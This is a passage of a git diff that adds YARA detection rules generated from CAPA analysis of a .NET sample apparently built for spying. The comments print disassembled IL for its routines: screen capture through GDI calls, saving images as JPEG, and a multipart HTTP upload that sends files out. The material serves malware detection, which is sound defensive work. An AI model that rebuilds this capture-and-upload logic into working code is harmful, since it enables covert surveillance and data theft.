?? ?? 00 00 2B ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 00 DE ?? 13 ?? 00 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE ?? 00 06 14 FE 03 13 ?? 11 ?? 2C ?? 06 6F ?? ?? ?? ?? 00 00 DC 2A } + condition: + all of them +} + 
diff --git a/yara/expected_1c444ebeba24dcba8628b7dfe5fec7c6.exe_.yar b/yara/expected_1c444ebeba24dcba8628b7dfe5fec7c6.exe_.yar
new file mode 100644
index 0000000..3404c05
--- /dev/null
+++ b/yara/expected_1c444ebeba24dcba8628b7dfe5fec7c6.exe_.yar
@@ -0,0 +1,1409 @@ +rule super_rule_1c444 +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "1c444ebeba24dcba8628b7dfe5fec7c6" + strings: + /* +function Reqss.Reqss::b__4d 0x0600006d@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - save image in .NET + 133F 02 ldarg.0 + 1340 7b a8 00 00 04 ldfld _temp_image_ + 1345 02 ldarg.0 + 1346 7b 9e 00 00 04 ldfld _temp_dir1 + 134B 28 63 00 00 0a call System.Drawing.Imaging.ImageFormat::get_Jpeg + 1350 6f 64 00 00 0a callvirt System.Drawing.Image::Save + 1355 2a ret + */ + $c0 = { 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A } + /* +function Screenss.ScreenCapture::CaptureWindow 0x06000073@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - capture screenshot + - unmanaged call + 1F74 03 ldarg.1 + 1F75 28 7d 00 00 06 call GetWindowDC + 1F7A 0a stloc.0 + 1F7B 12 01 ldloca.s local(0x0001) + 1F7D fe 15 0a 00 00 02 initobj .RECT + 1F83 03 ldarg.1 + 1F84 12 01 ldloca.s local(0x0001) + 1F86 28 7f 00 00 06 call GetWindowRect + 1F8B 26 pop + 1F8C 12 01 ldloca.s local(0x0001) + 1F8E 7b 7b 00 00 04 ldfld right + 1F93 12 01 ldloca.s local(0x0001) + 1F95 7b 79 00 00 04 ldfld left + 1F9A 59 sub + 1F9B 0c stloc.2 + 1F9C 12 01 ldloca.s local(0x0001) + 1F9E 7b 7c 00 00 04 ldfld bottom + 1FA3 12 01 ldloca.s local(0x0001) + 1FA5 7b 7a 00 00 04 ldfld top + 1FAA 59 sub + 1FAB 0d stloc.3 + 1FAC 06 ldloc.0 + 1FAD 28 77 00 00 06 call CreateCompatibleDC + 1FB2 13 04 stloc.s local(0x0004) + 1FB4 06 ldloc.0 + 1FB5 08 ldloc.2 + 1FB6 09 ldloc.3 + 1FB7 28 76 00 00 06 call CreateCompatibleBitmap + 1FBC 13 05 stloc.s local(0x0005) + 1FBE 11 04 ldloc.s local(0x0004) + 1FC0 11 05 ldloc.s local(0x0005) + 1FC2 28 7a 00 00 06 call SelectObject + 1FC7 13 06 stloc.s local(0x0006) + 1FC9 11 04 ldloc.s local(0x0004) + 1FCB 16 ldc.i4.0 + 1FCC 16 ldc.i4.0 + 1FCD 08 ldloc.2 + 1FCE 09 ldloc.3 + 1FCF 06 ldloc.0 + 1FD0 16 ldc.i4.0 + 1FD1 16 ldc.i4.0 + 1FD2 20 20 00 
cc 00 ldc.i4 0xcc0020 + 1FD7 28 75 00 00 06 call BitBlt + 1FDC 26 pop + 1FDD 11 04 ldloc.s local(0x0004) + 1FDF 11 06 ldloc.s local(0x0006) + 1FE1 28 7a 00 00 06 call SelectObject + 1FE6 26 pop + 1FE7 11 04 ldloc.s local(0x0004) + 1FE9 28 78 00 00 06 call DeleteDC + 1FEE 26 pop + 1FEF 03 ldarg.1 + 1FF0 06 ldloc.0 + 1FF1 28 7e 00 00 06 call ReleaseDC + 1FF6 26 pop + 1FF7 11 05 ldloc.s local(0x0005) + 1FF9 28 65 00 00 0a call System.Drawing.Image::FromHbitmap + 1FFE 13 07 stloc.s local(0x0007) + 2000 11 05 ldloc.s local(0x0005) + 2002 28 79 00 00 06 call DeleteObject + 2007 26 pop + 2008 11 07 ldloc.s local(0x0007) + 200A 2a ret + */ + $c1 = { 03 28 ?? ?? ?? ?? 0A 12 ?? FE 15 ?? ?? ?? ?? 03 12 ?? 28 ?? ?? ?? ?? 26 12 ?? 7B ?? ?? ?? ?? 12 ?? 7B ?? ?? ?? ?? 59 0C 12 ?? 7B ?? ?? ?? ?? 12 ?? 7B ?? ?? ?? ?? 59 0D 06 28 ?? ?? ?? ?? 13 ?? 06 08 09 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 16 08 09 06 16 16 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 11 ?? 11 ?? 28 ?? ?? ?? ?? 26 11 ?? 28 ?? ?? ?? ?? 26 03 06 28 ?? ?? ?? ?? 26 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 26 11 ?? 
2A } + /* +function Uploadss.Uploadss::MultiPart 0x06000096@1c444ebeba24dcba8628b7dfe5fec7c6 with 7 features: + - create HTTP request + - get file size + - receive HTTP response + - send HTTP request + - send data + - send request in .NET + - set web proxy in .NET + 2AA8 72 01 00 00 70 ldstr "" + 2AAD 0a stloc.0 + 2AAE 03 ldarg.1 + 2AAF 28 97 00 00 0a call System.Net.WebRequest::Create + 2AB4 74 58 00 00 01 castclass System.Net.HttpWebRequest + 2AB9 0b stloc.1 + 2ABA 07 ldloc.1 + 2ABB 1c ldc.i4.6 + 2ABC 73 98 00 00 0a newobj System.Net.Cache.RequestCachePolicy::.ctor + 2AC1 6f 99 00 00 0a callvirt System.Net.WebRequest::set_CachePolicy + 2AC6 07 ldloc.1 + 2AC7 14 ldnull + 2AC8 6f 9a 00 00 0a callvirt System.Net.WebRequest::set_Proxy + 2ACD 07 ldloc.1 + 2ACE 19 ldc.i4.3 + 2ACF 6f 9b 00 00 0a callvirt System.Net.HttpWebRequest::set_AutomaticDecompression + 2AD4 07 ldloc.1 + 2AD5 20 30 75 00 00 ldc.i4 0x7530 + 2ADA 6f 9c 00 00 0a callvirt System.Net.WebRequest::set_Timeout + 2ADF 07 ldloc.1 + 2AE0 28 9d 00 00 0a call System.Text.Encoding::get_Default + 2AE5 1a ldc.i4.4 + 2AE6 8d 3d 00 00 01 newarr System.Byte + 2AEB 25 dup + 2AEC d0 b1 00 00 04 ldtoken $$method0x600002a-1 + 2AF1 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2AF6 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2AFB 6f 9f 00 00 0a callvirt System.Net.WebRequest::set_Method + 2B00 28 a0 00 00 0a call System.DateTime::get_UtcNow + 2B05 13 1e stloc.s local(0x001E) + 2B07 12 1e ldloca.s local(0x001E) + 2B09 20 b2 07 00 00 ldc.i4 0x7b2 + 2B0E 17 ldc.i4.1 + 2B0F 17 ldc.i4.1 + 2B10 73 a1 00 00 0a newobj System.DateTime::.ctor + 2B15 28 a2 00 00 0a call System.DateTime::Subtract + 2B1A 13 1f stloc.s local(0x001F) + 2B1C 12 1f ldloca.s local(0x001F) + 2B1E 28 a3 00 00 0a call System.TimeSpan::get_TotalMilliseconds + 2B23 6a conv.i8 + 2B24 0c stloc.2 + 2B25 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B2A 1f 14 ldc.i4.s 0x14 + 2B2C 8d 3d 00 00 01 newarr 
System.Byte + 2B31 25 dup + 2B32 d0 b2 00 00 04 ldtoken $$method0x600002a-2 + 2B37 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2B3C 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2B41 0d stloc.3 + 2B42 09 ldloc.3 + 2B43 08 ldloc.2 + 2B44 8c 31 00 00 01 box System.Int64 + 2B49 28 52 00 00 0a call System.String::Concat + 2B4E 13 04 stloc.s local(0x0004) + 2B50 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B55 18 ldc.i4.2 + 2B56 8d 3d 00 00 01 newarr System.Byte + 2B5B 13 20 stloc.s local(0x0020) + 2B5D 11 20 ldloc.s local(0x0020) + 2B5F 16 ldc.i4.0 + 2B60 1f 0d ldc.i4.s 0xd + 2B62 9c stelem.i1 + 2B63 11 20 ldloc.s local(0x0020) + 2B65 17 ldc.i4.1 + 2B66 1f 0a ldc.i4.s 0xa + 2B68 9c stelem.i1 + 2B69 11 20 ldloc.s local(0x0020) + 2B6B 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2B70 26 pop + 2B71 07 ldloc.1 + 2B72 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B77 1f 21 ldc.i4.s 0x21 + 2B79 8d 3d 00 00 01 newarr System.Byte + 2B7E 25 dup + 2B7F d0 b3 00 00 04 ldtoken $$method0x600002a-3 + 2B84 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2B89 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2B8E 11 04 ldloc.s local(0x0004) + 2B90 28 a4 00 00 0a call System.String::Format + 2B95 6f a5 00 00 0a callvirt System.Net.WebRequest::set_ContentType + 2B9A 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B9F 18 ldc.i4.2 + 2BA0 8d 3d 00 00 01 newarr System.Byte + 2BA5 13 21 stloc.s local(0x0021) + 2BA7 11 21 ldloc.s local(0x0021) + 2BA9 16 ldc.i4.0 + 2BAA 1f 2d ldc.i4.s 0x2d + 2BAC 9c stelem.i1 + 2BAD 11 21 ldloc.s local(0x0021) + 2BAF 17 ldc.i4.1 + 2BB0 1f 2d ldc.i4.s 0x2d + 2BB2 9c stelem.i1 + 2BB3 11 21 ldloc.s local(0x0021) + 2BB5 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2BBA 11 04 ldloc.s local(0x0004) + 2BBC 28 50 00 00 0a call System.String::Concat + 2BC1 13 04 stloc.s local(0x0004) + 2BC3 28 29 00 00 0a call 
System.Text.Encoding::get_UTF8 + 2BC8 11 04 ldloc.s local(0x0004) + 2BCA 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2BCF 13 05 stloc.s local(0x0005) + 2BD1 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2BD6 1f 2e ldc.i4.s 0x2e + 2BD8 8d 3d 00 00 01 newarr System.Byte + 2BDD 25 dup + 2BDE d0 b4 00 00 04 ldtoken $$method0x600002a-4 + 2BE3 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2BE8 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2BED 13 06 stloc.s local(0x0006) + 2BEF 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2BF4 1f 51 ldc.i4.s 0x51 + 2BF6 8d 3d 00 00 01 newarr System.Byte + 2BFB 25 dup + 2BFC d0 b5 00 00 04 ldtoken $$method0x600002a-5 + 2C01 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2C06 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2C0B 13 07 stloc.s local(0x0007) + 2C0D 16 ldc.i4.0 + 2C0E 6a conv.i8 + 2C0F 13 08 stloc.s local(0x0008) + 2C11 11 08 ldloc.s local(0x0008) + 2C13 11 05 ldloc.s local(0x0005) + 2C15 8e ldlen + 2C16 69 conv.i4 + 2C17 6a conv.i8 + 2C18 58 add + 2C19 13 08 stloc.s local(0x0008) + 2C1B 04 ldarg.2 + 2C1C 6f a6 00 00 0a callvirt GetEnumerator + 2C21 13 22 stloc.s local(0x0022) + 2C23 2b 5a br.s 0x2c7f + 2C25 12 22 ldloca.s local(0x0022) + 2C27 28 a7 00 00 0a call get_Current + 2C2C 13 09 stloc.s local(0x0009) + 2C2E 11 06 ldloc.s local(0x0006) + 2C30 11 09 ldloc.s local(0x0009) + 2C32 7b a9 00 00 04 ldfld name + 2C37 28 a4 00 00 0a call System.String::Format + 2C3C 11 09 ldloc.s local(0x0009) + 2C3E 7b aa 00 00 04 ldfld value + 2C43 28 a8 00 00 0a call System.Uri::EscapeDataString + 2C48 28 50 00 00 0a call System.String::Concat + 2C4D 13 0a stloc.s local(0x000A) + 2C4F 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2C54 11 0a ldloc.s local(0x000A) + 2C56 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2C5B 13 0b stloc.s local(0x000B) + 2C5D 11 08 ldloc.s local(0x0008) + 2C5F 18 
ldc.i4.2 + 2C60 6a conv.i8 + 2C61 58 add + 2C62 13 08 stloc.s local(0x0008) + 2C64 11 08 ldloc.s local(0x0008) + 2C66 11 0b ldloc.s local(0x000B) + 2C68 8e ldlen + 2C69 69 conv.i4 + 2C6A 6a conv.i8 + 2C6B 58 add + 2C6C 13 08 stloc.s local(0x0008) + 2C6E 11 08 ldloc.s local(0x0008) + 2C70 18 ldc.i4.2 + 2C71 6a conv.i8 + 2C72 58 add + 2C73 13 08 stloc.s local(0x0008) + 2C75 11 08 ldloc.s local(0x0008) + 2C77 11 05 ldloc.s local(0x0005) + 2C79 8e ldlen + 2C7A 69 conv.i4 + 2C7B 6a conv.i8 + 2C7C 58 add + 2C7D 13 08 stloc.s local(0x0008) + 2C7F 12 22 ldloca.s local(0x0022) + 2C81 28 a9 00 00 0a call MoveNext + 2C86 2d 9d brtrue.s 0x2c25 + 2C88 de 0e leave.s 0x2c98 + 2C8A 12 22 ldloca.s local(0x0022) + 2C8C fe 16 07 00 00 1b constrained. [CLR_METADATA_TABLE_TYPESPEC] + 0x7032 0x0 Signature_BlobIndex: 5CF + 2C92 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2C97 dc endfinally + 2C98 05 ldarg.3 + 2C99 6f aa 00 00 0a callvirt GetEnumerator + 2C9E 13 23 stloc.s local(0x0023) + 2CA0 2b 76 br.s 0x2d18 + 2CA2 12 23 ldloca.s local(0x0023) + 2CA4 28 ab 00 00 0a call get_Current + 2CA9 13 0c stloc.s local(0x000C) + 2CAB 11 07 ldloc.s local(0x0007) + 2CAD 11 0c ldloc.s local(0x000C) + 2CAF 7b ab 00 00 04 ldfld name + 2CB4 11 0c ldloc.s local(0x000C) + 2CB6 7b ac 00 00 04 ldfld filepath + 2CBB 28 ac 00 00 0a call System.IO.Path::GetFileName + 2CC0 11 0c ldloc.s local(0x000C) + 2CC2 7b ad 00 00 04 ldfld contenttype + 2CC7 28 ad 00 00 0a call System.String::Format + 2CCC 13 0d stloc.s local(0x000D) + 2CCE 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2CD3 11 0d ldloc.s local(0x000D) + 2CD5 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2CDA 13 0e stloc.s local(0x000E) + 2CDC 11 08 ldloc.s local(0x0008) + 2CDE 18 ldc.i4.2 + 2CDF 6a conv.i8 + 2CE0 58 add + 2CE1 13 08 stloc.s local(0x0008) + 2CE3 11 08 ldloc.s local(0x0008) + 2CE5 11 0e ldloc.s local(0x000E) + 2CE7 8e ldlen + 2CE8 69 conv.i4 + 2CE9 6a conv.i8 + 2CEA 58 add + 2CEB 13 08 stloc.s local(0x0008) + 
2CED 11 0c ldloc.s local(0x000C) + 2CEF 7b ac 00 00 04 ldfld filepath + 2CF4 73 24 00 00 0a newobj System.IO.FileInfo::.ctor + 2CF9 13 0f stloc.s local(0x000F) + 2CFB 11 08 ldloc.s local(0x0008) + 2CFD 11 0f ldloc.s local(0x000F) + 2CFF 6f 4f 00 00 0a callvirt System.IO.FileInfo::get_Length + 2D04 58 add + 2D05 13 08 stloc.s local(0x0008) + 2D07 11 08 ldloc.s local(0x0008) + 2D09 18 ldc.i4.2 + 2D0A 6a conv.i8 + 2D0B 58 add + 2D0C 13 08 stloc.s local(0x0008) + 2D0E 11 08 ldloc.s local(0x0008) + 2D10 11 05 ldloc.s local(0x0005) + 2D12 8e ldlen + 2D13 69 conv.i4 + 2D14 6a conv.i8 + 2D15 58 add + 2D16 13 08 stloc.s local(0x0008) + 2D18 12 23 ldloca.s local(0x0023) + 2D1A 28 ae 00 00 0a call MoveNext + 2D1F 2d 81 brtrue.s 0x2ca2 + 2D21 de 0e leave.s 0x2d31 + 2D23 12 23 ldloca.s local(0x0023) + 2D25 fe 16 08 00 00 1b constrained. [CLR_METADATA_TABLE_TYPESPEC] + 0x7034 0x0 Signature_BlobIndex: 5DC + 2D2B 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2D30 dc endfinally + 2D31 11 08 ldloc.s local(0x0008) + 2D33 18 ldc.i4.2 + 2D34 6a conv.i8 + 2D35 58 add + 2D36 13 08 stloc.s local(0x0008) + 2D38 11 08 ldloc.s local(0x0008) + 2D3A 18 ldc.i4.2 + 2D3B 6a conv.i8 + 2D3C 58 add + 2D3D 13 08 stloc.s local(0x0008) + 2D3F 07 ldloc.1 + 2D40 11 08 ldloc.s local(0x0008) + 2D42 6f af 00 00 0a callvirt System.Net.WebRequest::set_ContentLength + 2D47 07 ldloc.1 + 2D48 6f b0 00 00 0a callvirt System.Net.WebRequest::GetRequestStream + 2D4D 13 10 stloc.s local(0x0010) + 2D4F 11 10 ldloc.s local(0x0010) + 2D51 11 05 ldloc.s local(0x0005) + 2D53 16 ldc.i4.0 + 2D54 11 05 ldloc.s local(0x0005) + 2D56 8e ldlen + 2D57 69 conv.i4 + 2D58 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2D5D 04 ldarg.2 + 2D5E 6f a6 00 00 0a callvirt GetEnumerator + 2D63 13 24 stloc.s local(0x0024) + 2D65 38 92 00 00 00 br 0x2dfc + 2D6A 12 24 ldloca.s local(0x0024) + 2D6C 28 a7 00 00 0a call get_Current + 2D71 13 11 stloc.s local(0x0011) + 2D73 11 06 ldloc.s local(0x0006) + 2D75 11 11 ldloc.s local(0x0011) + 
2D77 7b a9 00 00 04 ldfld name + 2D7C 28 a4 00 00 0a call System.String::Format + 2D81 11 11 ldloc.s local(0x0011) + 2D83 7b aa 00 00 04 ldfld value + 2D88 28 a8 00 00 0a call System.Uri::EscapeDataString + 2D8D 28 50 00 00 0a call System.String::Concat + 2D92 13 12 stloc.s local(0x0012) + 2D94 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2D99 11 12 ldloc.s local(0x0012) + 2D9B 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2DA0 13 13 stloc.s local(0x0013) + 2DA2 11 10 ldloc.s local(0x0010) + 2DA4 18 ldc.i4.2 + 2DA5 8d 3d 00 00 01 newarr System.Byte + 2DAA 13 25 stloc.s local(0x0025) + 2DAC 11 25 ldloc.s local(0x0025) + 2DAE 16 ldc.i4.0 + 2DAF 1f 0d ldc.i4.s 0xd + 2DB1 9c stelem.i1 + 2DB2 11 25 ldloc.s local(0x0025) + 2DB4 17 ldc.i4.1 + 2DB5 1f 0a ldc.i4.s 0xa + 2DB7 9c stelem.i1 + 2DB8 11 25 ldloc.s local(0x0025) + 2DBA 16 ldc.i4.0 + 2DBB 18 ldc.i4.2 + 2DBC 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DC1 11 10 ldloc.s local(0x0010) + 2DC3 11 13 ldloc.s local(0x0013) + 2DC5 16 ldc.i4.0 + 2DC6 11 13 ldloc.s local(0x0013) + 2DC8 8e ldlen + 2DC9 69 conv.i4 + 2DCA 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DCF 11 10 ldloc.s local(0x0010) + 2DD1 18 ldc.i4.2 + 2DD2 8d 3d 00 00 01 newarr System.Byte + 2DD7 13 26 stloc.s local(0x0026) + 2DD9 11 26 ldloc.s local(0x0026) + 2DDB 16 ldc.i4.0 + 2DDC 1f 0d ldc.i4.s 0xd + 2DDE 9c stelem.i1 + 2DDF 11 26 ldloc.s local(0x0026) + 2DE1 17 ldc.i4.1 + 2DE2 1f 0a ldc.i4.s 0xa + 2DE4 9c stelem.i1 + 2DE5 11 26 ldloc.s local(0x0026) + 2DE7 16 ldc.i4.0 + 2DE8 18 ldc.i4.2 + 2DE9 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DEE 11 10 ldloc.s local(0x0010) + 2DF0 11 05 ldloc.s local(0x0005) + 2DF2 16 ldc.i4.0 + 2DF3 11 05 ldloc.s local(0x0005) + 2DF5 8e ldlen + 2DF6 69 conv.i4 + 2DF7 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DFC 12 24 ldloca.s local(0x0024) + 2DFE 28 a9 00 00 0a call MoveNext + 2E03 3a 62 ff ff ff brtrue 0x2d6a + 2E08 de 0e leave.s 0x2e18 + 2E0A 12 24 ldloca.s local(0x0024) + 2E0C 
fe 16 07 00 00 1b constrained. [CLR_METADATA_TABLE_TYPESPEC] + 0x7032 0x0 Signature_BlobIndex: 5CF + 2E12 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2E17 dc endfinally + 2E18 05 ldarg.3 + 2E19 6f aa 00 00 0a callvirt GetEnumerator + 2E1E 13 27 stloc.s local(0x0027) + 2E20 38 ea 00 00 00 br 0x2f0f + 2E25 12 27 ldloca.s local(0x0027) + 2E27 28 ab 00 00 0a call get_Current + 2E2C 13 14 stloc.s local(0x0014) + 2E2E 11 07 ldloc.s local(0x0007) + 2E30 11 14 ldloc.s local(0x0014) + 2E32 7b ab 00 00 04 ldfld name + 2E37 11 14 ldloc.s local(0x0014) + 2E39 7b ac 00 00 04 ldfld filepath + 2E3E 28 ac 00 00 0a call System.IO.Path::GetFileName + 2E43 11 14 ldloc.s local(0x0014) + 2E45 7b ad 00 00 04 ldfld contenttype + 2E4A 28 ad 00 00 0a call System.String::Format + 2E4F 13 15 stloc.s local(0x0015) + 2E51 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2E56 11 15 ldloc.s local(0x0015) + 2E58 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2E5D 13 16 stloc.s local(0x0016) + 2E5F 11 10 ldloc.s local(0x0010) + 2E61 18 ldc.i4.2 + 2E62 8d 3d 00 00 01 newarr System.Byte + 2E67 13 28 stloc.s local(0x0028) + 2E69 11 28 ldloc.s local(0x0028) + 2E6B 16 ldc.i4.0 + 2E6C 1f 0d ldc.i4.s 0xd + 2E6E 9c stelem.i1 + 2E6F 11 28 ldloc.s local(0x0028) + 2E71 17 ldc.i4.1 + 2E72 1f 0a ldc.i4.s 0xa + 2E74 9c stelem.i1 + 2E75 11 28 ldloc.s local(0x0028) + 2E77 16 ldc.i4.0 + 2E78 18 ldc.i4.2 + 2E79 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2E7E 11 10 ldloc.s local(0x0010) + 2E80 11 16 ldloc.s local(0x0016) + 2E82 16 ldc.i4.0 + 2E83 11 16 ldloc.s local(0x0016) + 2E85 8e ldlen + 2E86 69 conv.i4 + 2E87 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2E8C 11 14 ldloc.s local(0x0014) + 2E8E 7b ac 00 00 04 ldfld filepath + 2E93 19 ldc.i4.3 + 2E94 17 ldc.i4.1 + 2E95 73 b1 00 00 0a newobj System.IO.FileStream::.ctor + 2E9A 13 17 stloc.s local(0x0017) + 2E9C 20 00 00 10 00 ldc.i4 0x100000 + 2EA1 8d 3d 00 00 01 newarr System.Byte + 2EA6 13 18 stloc.s local(0x0018) + 2EA8 11 17 
ldloc.s local(0x0017) + 2EAA 11 18 ldloc.s local(0x0018) + 2EAC 16 ldc.i4.0 + 2EAD 11 18 ldloc.s local(0x0018) + 2EAF 8e ldlen + 2EB0 69 conv.i4 + 2EB1 6f 84 00 00 0a callvirt System.IO.Stream::Read + 2EB6 13 19 stloc.s local(0x0019) + 2EB8 2b 1c br.s 0x2ed6 + 2EBA 11 10 ldloc.s local(0x0010) + 2EBC 11 18 ldloc.s local(0x0018) + 2EBE 16 ldc.i4.0 + 2EBF 11 19 ldloc.s local(0x0019) + 2EC1 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2EC6 11 17 ldloc.s local(0x0017) + 2EC8 11 18 ldloc.s local(0x0018) + 2ECA 16 ldc.i4.0 + 2ECB 11 18 ldloc.s local(0x0018) + 2ECD 8e ldlen + 2ECE 69 conv.i4 + 2ECF 6f 84 00 00 0a callvirt System.IO.Stream::Read + 2ED4 13 19 stloc.s local(0x0019) + 2ED6 11 19 ldloc.s local(0x0019) + 2ED8 16 ldc.i4.0 + 2ED9 30 df bgt.s 0x2eba + 2EDB 11 17 ldloc.s local(0x0017) + 2EDD 6f b2 00 00 0a callvirt System.IO.Stream::Close + 2EE2 11 10 ldloc.s local(0x0010) + 2EE4 18 ldc.i4.2 + 2EE5 8d 3d 00 00 01 newarr System.Byte + 2EEA 13 29 stloc.s local(0x0029) + 2EEC 11 29 ldloc.s local(0x0029) + 2EEE 16 ldc.i4.0 + 2EEF 1f 0d ldc.i4.s 0xd + 2EF1 9c stelem.i1 + 2EF2 11 29 ldloc.s local(0x0029) + 2EF4 17 ldc.i4.1 + 2EF5 1f 0a ldc.i4.s 0xa + 2EF7 9c stelem.i1 + 2EF8 11 29 ldloc.s local(0x0029) + 2EFA 16 ldc.i4.0 + 2EFB 18 ldc.i4.2 + 2EFC 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F01 11 10 ldloc.s local(0x0010) + 2F03 11 05 ldloc.s local(0x0005) + 2F05 16 ldc.i4.0 + 2F06 11 05 ldloc.s local(0x0005) + 2F08 8e ldlen + 2F09 69 conv.i4 + 2F0A 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F0F 12 27 ldloca.s local(0x0027) + 2F11 28 ae 00 00 0a call MoveNext + 2F16 3a 0a ff ff ff brtrue 0x2e25 + 2F1B de 0e leave.s 0x2f2b + 2F1D 12 27 ldloca.s local(0x0027) + 2F1F fe 16 08 00 00 1b constrained. 
[CLR_METADATA_TABLE_TYPESPEC] + 0x7034 0x0 Signature_BlobIndex: 5DC + 2F25 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2F2A dc endfinally + 2F2B 11 10 ldloc.s local(0x0010) + 2F2D 18 ldc.i4.2 + 2F2E 8d 3d 00 00 01 newarr System.Byte + 2F33 13 2a stloc.s local(0x002A) + 2F35 11 2a ldloc.s local(0x002A) + 2F37 16 ldc.i4.0 + 2F38 1f 2d ldc.i4.s 0x2d + 2F3A 9c stelem.i1 + 2F3B 11 2a ldloc.s local(0x002A) + 2F3D 17 ldc.i4.1 + 2F3E 1f 2d ldc.i4.s 0x2d + 2F40 9c stelem.i1 + 2F41 11 2a ldloc.s local(0x002A) + 2F43 16 ldc.i4.0 + 2F44 18 ldc.i4.2 + 2F45 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F4A 11 10 ldloc.s local(0x0010) + 2F4C 18 ldc.i4.2 + 2F4D 8d 3d 00 00 01 newarr System.Byte + 2F52 13 2b stloc.s local(0x002B) + 2F54 11 2b ldloc.s local(0x002B) + 2F56 16 ldc.i4.0 + 2F57 1f 0d ldc.i4.s 0xd + 2F59 9c stelem.i1 + 2F5A 11 2b ldloc.s local(0x002B) + 2F5C 17 ldc.i4.1 + 2F5D 1f 0a ldc.i4.s 0xa + 2F5F 9c stelem.i1 + 2F60 11 2b ldloc.s local(0x002B) + 2F62 16 ldc.i4.0 + 2F63 18 ldc.i4.2 + 2F64 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F69 11 10 ldloc.s local(0x0010) + 2F6B 6f 8a 00 00 0a callvirt System.IO.Stream::Flush + 2F70 11 10 ldloc.s local(0x0010) + 2F72 6f b2 00 00 0a callvirt System.IO.Stream::Close + 2F77 07 ldloc.1 + 2F78 6f b3 00 00 0a callvirt System.Net.WebRequest::GetResponse + 2F7D 74 67 00 00 01 castclass System.Net.HttpWebResponse + 2F82 13 1a stloc.s local(0x001A) + 2F84 11 1a ldloc.s local(0x001A) + 2F86 6f b4 00 00 0a callvirt System.Net.WebResponse::GetResponseStream + 2F8B 13 1b stloc.s local(0x001B) + 2F8D 11 1b ldloc.s local(0x001B) + 2F8F 73 b5 00 00 0a newobj System.IO.StreamReader::.ctor + 2F94 13 1c stloc.s local(0x001C) + 2F96 11 1c ldloc.s local(0x001C) + 2F98 6f b6 00 00 0a callvirt System.IO.TextReader::ReadToEnd + 2F9D 0a stloc.0 + 2F9E 11 1c ldloc.s local(0x001C) + 2FA0 6f b7 00 00 0a callvirt System.IO.TextReader::Close + 2FA5 11 1b ldloc.s local(0x001B) + 2FA7 6f b2 00 00 0a callvirt System.IO.Stream::Close + 
